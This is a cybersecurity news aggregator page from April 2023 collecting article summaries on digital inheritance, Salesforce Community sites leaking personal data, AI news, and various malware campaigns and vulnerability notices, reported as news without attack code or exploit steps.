Oktacron logo
Cyber security aggregate rss news

Cyber security aggregator - feeds history
image for Transatlantic Cable ...

 News

Episode 296 kicks off with news that Oasis may be reforming – except not really. Turns out some boffins have figured out how to use A.I to create new Oasis music. Unsurprisingly, UMG (Universal Music Group) arent too happy. From A.I to A.I, the next story looks at the evolution of Googles Bard bot and following that   show more ...

theres discussion around the U.K governments decision to build their own super-computer, with the purpose of, you guessed it, artificial intelligence. To wrap up, the team discuss a story about Twitters recent problems around verification status. If you liked what you heard, please consider subscribing. Musicians threaten to make Oasis Live Forever with AI Google Bard introduces new features for generating and debugging code gov gathers up £100M for AI super-models Twitter gives fake Disney account verified status

image for Who gets your digita ...

 Privacy

That humans are mortal is not news. What is novel, however, is that over the past two decades people have accumulated digital assets that never used to exist. And many of us have probably posed the question at some point: what will happen afterward to all my social media and messenger accounts, all my cloud archives   show more ...

of e-mails and photos, plus domains and websites, not to mention e-wallets and accounts on trading platforms? Posthumous account In 2012, the parents of a 15-year-old girl from Berlin tried to log into her Facebook account after their daughter jumped in front of a train. Her parents wanted to find out what had led to her suicide; they suspected cyberbullying. However, the account had already been memorialized and no one could access it. Only after six years (!) of litigation, in 2018, did the German Supreme Court rule that, when it comes to inheritance, social media accounts are no different to personal letters and diaries; that is, they must be transferred to the legal heirs — in this case, the parents. But why did the process take so long? Because the IT industry doesnt agree with this characterization of digital assets. There are usually two counterarguments. First, Facebook and other services cite personal data protection laws: such data cannot be transferred to third parties without the owners permission. True, the owner is deceased in this case, but the people they exchanged messages with are still alive and havent given permission to read their correspondence. Another reason to refuse potential heirs request is that many digital services provide their products under a license — as a service for temporary use. And the law doesnt provide for the inheritance of such a lease. For example, in some countries domain names are registered on the basis of a service agreement, and services are not included in the will of the deceased. Rules for digital cemeteries When inheritance laws dont cover a digital asset, hope lies with the companys policy and the steps taken by the testator before their death. Some domain registrars make it possible to transfer a domain to the next of kin, provided the necessary documents are presented. Other services are also slowly beginning to introduce a similar policy. The latest versions of iOS allow you to designate a legacy contact — a digital successor who will have access to your Apple ID in the event of your death. True, not all of your digital assets will be made available to your chosen heir. In particular, they wont get access to your e-books, movies, music or other purchases made online (recall that a digital book isnt a book, but a temporarily rented service!). For Google accounts, this feature is called Inactive Account Manager. Your designated successor will have access to your data if the account is inactive for a long time (you set the period of inactivity yourself). Facebook has something similar for memorializing accounts. You can inform the company in advance of your posthumous wishes regarding your account: either to have it deleted entirely, or to specify legacy contacts, wholl manage your memorialized account; or rather — watch over it: theyll not be able to change old content, read messages or delete friends, but only change your profile photo, post a memorial, and allow selected friends to write tributes in a special memorial feed. In addition, legacy contacts must have their own Facebook account (yes, the social network never misses an opportunity to boost its user base). All the same, the rules differ from service to service, each with its own peculiarities. There are already tens of millions of social media accounts that belong to folks no longer with us. And by far not all of them have been memorialized. After all, as in the case of deleting an account, its necessary to provide the service with documents proving the owners death (Instagram, LinkedIn and other social networks operate similar rules). But in many cases accounts continue to be maintained by relatives, and sometimes by complete strangers, using the popularity of the deceased for their own purposes. And social networks themselves automatically invite us to congratulate the deceased on their birthdays or inadvertently confront us with painful memories. Its possible that in the virtual metaverses of the future, hordes of the dead will roam the streets on autopilot, like in the worst kind of zombie apocalypse movie. What to do — when still alive! Lets recap. Theres no one-size-fits-all solution, but we can all individually take care of what happens to our digital assets after we shuffle off this mortal coil. You might want to make a will with a lawyer, specifying your digital assets and the people who will inherit them. Even if the inheritance law in your country doesnt cover such assets, having a will can help in disputes. Find out about the legacy policy of each digital service you use, and what needs to be done in the settings or contracts. For example, funds in e-wallets can pass to the rightful heirs without additional measures, as money is covered by inheritance law. But in the case of e-mail and various types of digital storage and social networks, it makes sense to set up a legacy contact in the service. To do this, youll have to read and follow the guidelines of each specific service. For their part, your heirs will have to figure out what the procedure is for gaining access in each of these services. If youve set up a legacy contact, theyll have to present a certain document or electronic code to gain access, depending on the rules of the service in question. Many services (such as Twitter, Instagram and LinkedIn) dont transfer access to deceased users accounts to anyone. They may, at the request of relatives, delete or memorialize an account — but even this requires the right documentation. And in certain cases you may need to prove your rights in court. Kaspersky Global Research & Analysis Team (GReAT) experts Marco Preuss (Deputy Director) and Dan Demeter (Senior Security Researcher), in their Digital Life and Physical Death session at the RSA Conference 2023, raised a number of additional factors for us to consider while alive. Its necessary to decide in advance what kind of data you want to bequeath, in what format, and on what media it will be stored. Unfortunately, the lifespan of modern storage media is 5–30 years, so digital archives need to be periodically updated and transferred to more modern media. Dont rely too much on cloud storage: how many of those have closed down in the last 10 years? If your digital storage contains documents in proprietary formats, also take care of the software for opening them. Imagine you have valuable documents in, say, SuperCalc or other outdated formats. Either convert the documents to modern open formats, or attach copies of software that can open them. The same goes for any specialized hardware that may be needed to access your data. Include a detailed description of everything youve collected, where its located, and how to use it. Besides a textual description, its worth adding audio or video recordings which, as well as giving instructions, clearly express your wishes regarding whats to be done with your digital legacy. Keep passwords, private keys, and other tools for accessing encrypted and private data in a safe, separate place. Important! Dont include passwords or private keys in your will. Wills become a matter of public record in certain countries. The most reliable way to store them is in a dedicated digital vault, such as Kaspersky Password Manager, protected with a master password, and to transfer access to this storage to a trusted person along with posthumous instructions: for example, Delete everything. The main thing here is to choose the right person. Remember the case of writer Vladimir Nabokov: he left instructions to destroy the manuscript of his last unfinished novel, but his wife didnt comply, and his son published his fathers drafts in Playboy magazine.

image for Many Public Salesfor ...

 A Little Sunshine

A shocking number of organizations — including banks and healthcare providers — are leaking private and sensitive information from their public Salesforce Community websites, KrebsOnSecurity has learned. The data exposures all stem from a misconfiguration in Salesforce Community that allows an   show more ...

unauthenticated user to access records that should only be available after logging in. A researcher found DC Health had five Salesforce Community sites exposing data. Salesforce Community is a widely-used cloud-based software product that makes it easy for organizations to quickly create websites. Customers can access a Salesforce Community website in two ways: Authenticated access (requiring login), and guest user access (no login required). The guest access feature allows unauthenticated users to view specific content and resources without needing to log in. However, sometimes Salesforce administrators mistakenly grant guest users access to internal resources, which can cause unauthorized users to access an organization’s private information and lead to potential data leaks. Until being contacted by this reporter on Monday, the state of Vermont had at least five separate Salesforce Community sites that allowed guest access to sensitive data, including a Pandemic Unemployment Assistance program that exposed the applicant’s full name, Social Security number, address, phone number, email, and bank account number. This misconfigured Salesforce Community site from the state of Vermont was leaking pandemic assistance loan application data, including names, SSNs, email address and bank account information. Vermont’s Chief Information Security Officer Scott Carbee said his security teams have been conducting a full review of their Salesforce Community sites, and already found one additional Salesforce site operated by the state that was also misconfigured to allow guest access to sensitive information. “My team is frustrated by the permissive nature of the platform,” Carbee said. Carbee said the vulnerable sites were all created rapidly in response to the Coronavirus pandemic, and were not subjected to their normal security review process. “During the pandemic, we were largely standing up tons of applications, and let’s just say a lot of them didn’t have the full benefit of our dev/ops process,” Carbee said. “In our case, we didn’t have any native Salesforce developers when we had to suddenly stand up all these sites.” Earlier this week, KrebsOnSecurity notified Columbus, Ohio-based Huntington Bank that its recently acquired TCF Bank had a Salesforce Community website that was leaking documents related to commercial loans. The data fields in those loan applications included name, address, full Social Security number, title, federal ID, IP address, average monthly payroll, and loan amount. Huntington Bank has disabled the leaky TCF Bank Salesforce website. Matthew Jennings, deputy chief information security officer at Huntington, said the company was still investigating how the misconfiguration occurred, how long it lasted, and how many records may have been exposed. KrebsOnSecurity learned of the leaks from security researcher Charan Akiri, who said he wrote a program that identified hundreds of other organizations running misconfigured Salesforce pages. But Akiri said he’s been wary of probing too far, and has had difficulty getting responses from most of the organizations he has notified to date. “In January and February 2023, I contacted government organizations and several companies, but I did not receive any response from these organizations,” Akiri said. “To address the issue further, I reached out to several CISOs on LinkedIn and Twitter. As a result, five companies eventually fixed the problem. Unfortunately, I did not receive any responses from government organizations.” The problem Akiri has been trying to raise awareness about came to the fore in August 2021, when security researcher Aaron Costello published a blog post explaining how misconfigurations in Salesforce Community sites could be exploited to reveal sensitive data (Costello subsequently published a follow-up post detailing how to lock down Salesforce Community sites). On Monday, KrebsOnSecurity used Akiri’s findings to notify Washington D.C. city administrators that at least five different public DC Health websites were leaking sensitive information. One DC Health Salesforce Community website designed for health professionals seeking to renew licenses with the city leaked documents that included the applicant’s full name, address, Social Security number, date of birth, license number and expiration, and more. Akiri said he notified the Washington D.C. government in February about his findings, but received no response. Reached by KrebsOnSecurity, interim Chief Information Security Officer Mike Rupert initially said the District had hired a third party to investigate, and that the third party confirmed the District’s IT systems were not vulnerable to data loss from the reported Salesforce configuration issue. But after being presented with a document including the Social Security number of a health professional in D.C. that was downloaded in real-time from the DC Health public Salesforce website, Rupert acknowledged his team had overlooked some configuration settings. Washington, D.C. health administrators are still smarting from a data breach earlier this year at the health insurance exchange DC Health Link, which exposed personal information for more than 56,000 users, including many members of Congress. That data later wound up for sale on a top cybercrime forum. The Associated Press reports that the DC Health Link breach was likewise the result of human error, and said an investigation revealed the cause was a DC Health Link server that was “misconfigured to allow access to the reports on the server without proper authentication.” Salesforce says the data exposures are not the result of a vulnerability inherent to the Salesforce platform, but they can occur when customers’ access control permissions are misconfigured. “As previously communicated to all Experience Site and Sites customers, we recommend utilizing the Guest User Access Report Package to assist in reviewing access control permissions for unauthenticated users,” reads a Salesforce advisory from Sept. 2022. “Additionally, we suggest reviewing the following Help article, Best Practices and Considerations When Configuring the Guest User Profile.” In a written statement, Salesforce said it is actively focused on data security for organizations with guest users, and that it continues to release “robust tools and guidance for our customers,” including: Guest User Access Report  Control Which Users Experience Cloud Site Users Can See Best Practices and Considerations When Configuring the Guest User Profile “We’ve also continued to update our Guest User security policies, beginning with our Spring ‘21 release with more to come in Summer ‘23,” the statement reads. “Lastly, we continue to proactively communicate with customers to help them understand the capabilities available to them, and how they can best secure their instance of Salesforce to meet their security, contractual, and regulatory obligations.”

 Expert Blogs and Opinion

While there have been many laudable applications of these technologies in healthcare, education, and even art, it’s essential to understand the broader way in which these technologies could be used and the potential risks they pose.

 Malware and Vulnerabilities

A Veeam Backup process was seen carrying out a shell command to download and implement a PowerShell script abusing the Veeam Backup & Replication vulnerability, CVE-2023-27532. Further analysis revealed that the script was in fact the Powertrash in-memory dropper, a tool that has been previously used by FIN7. Consequently, the group deployed Diceloader, a backdoor also referred to as Lizar.

 Breaches and Incidents

A school in Wiltshire was hit by a ransomware attack last weekend. Hardenhuish School, a mixed secondary academy in Chippenham, sent texts to parents and guardians of its 1,623 pupils notifying them of the attack.

 Govt., Critical Infrastructure

A senior Department of Homeland Security official confirmed Wednesday that DHS is working with Congress and the White House on a bill that would codify the Cyber Safety Review Board (CSRB) — a new effort to examine major cybersecurity incidents.

 Threat Actors

Unit 42 discovered a new version of the PingPull malware, designed by Alloy Taurus (aka Gallium), to cripple Linux systems. It is essentially an ELF file that only 3 out of 62 antivirus vendors flagged as malicious. During the investigation, the threat actor's infrastructure also blurted out the evidence of another backdoor used in the attack known as Sword2033.

 Malware and Vulnerabilities

TrendMicro uncovered a new risk to Docker containers from a piece of malware called TrafficStealer. It influences web traffic and ad interaction via the use of containers to generate illegal income. TrafficStealer uses a combination of two techniques: web crawling and click simulation. Experts recommend   show more ...

implementing zero-trust security for all container environments and auditing for any unwanted open container APIs.

 Malware and Vulnerabilities

Private Telegram channels are being abused by cybercriminals to sell a new macOS malware variant that can infect over 50 cryptocurrency extensions to steal data. Dubbed Atomic, the malware author provides its buyers a ready-to-use web panel for easy victim management, a cryptocurrency checker, a MetaMask brute-forcer, a dmg installer, and the ability to receive stolen logs on Telegram.

 Feed

Ubuntu Security Notice 6046-1 - It was discovered that OpenSSL-ibmca incorrectly handled certain RSA decryption. An attacker could possibly use this issue to expose sensitive information.

 Feed

Ubuntu Security Notice 6047-1 - It was discovered that the Traffic-Control Index implementation in the Linux kernel did not properly perform filter deactivation in some situations. A local attacker could possibly use this to gain elevated privileges. Please note that with the fix for this CVE, kernel support for the TCINDEX classifier has been removed.

 Feed

An ongoing Magecart campaign has attracted the attention of cybersecurity researchers for leveraging realistic-looking fake payment screens to capture sensitive data entered by unsuspecting users. "The threat actor used original logos from the compromised store and customized a web element known as a modal to perfectly hijack the checkout page," Jérôme Segura, director of threat intelligence at

 Feed

South Korean education, construction, diplomatic, and political institutions are at the receiving end of new attacks perpetrated by a China-aligned threat actor known as the Tonto Team. "Recent cases have revealed that the group is using a file related to anti-malware products to ultimately execute their malicious attacks," the AhnLab Security Emergency Response Center (ASEC) said in a report

 Feed

Threat actors are advertising a new information stealer for the Apple macOS operating system called Atomic macOS Stealer (or AMOS) on Telegram for $1,000 per month, joining the likes of MacStealer. "The Atomic macOS Stealer can steal various types of information from the victim's machine, including Keychain passwords, complete system information, files from the desktop and documents folder, and

 Feed

Stopping new and evasive threats is one of the greatest challenges in cybersecurity. This is among the biggest reasons why attacks increased dramatically in the past year yet again, despite the estimated $172 billion spent on global cybersecurity in 2022. Armed with cloud-based tools and backed by sophisticated affiliate networks, threat actors can develop new and evasive malware more quickly

 Feed

Networking equipment maker Zyxel has released patches for a critical security flaw in its firewall devices that could be exploited to achieve remote code execution on affected systems. The issue, tracked as CVE-2023-28771, is rated 9.8 on the CVSS scoring system. Researchers from TRAPA Security have been credited with reporting the flaw. "Improper error message handling in some firewall versions

 Feed

A significant number of victims in the consumer and enterprise sectors located across Australia, Japan, the U.S., and India have been affected by an evasive information-stealing malware called ViperSoftX. ViperSoftX was first documented in 2020, with cybersecurity company Avast detailing a campaign in November 2022 that leveraged the malware to distribute a malicious Google Chrome extension

2023-04
Aggregator history
Friday, April 28
SAT
SUN
MON
TUE
WED
THU
FRI
AprilMayJune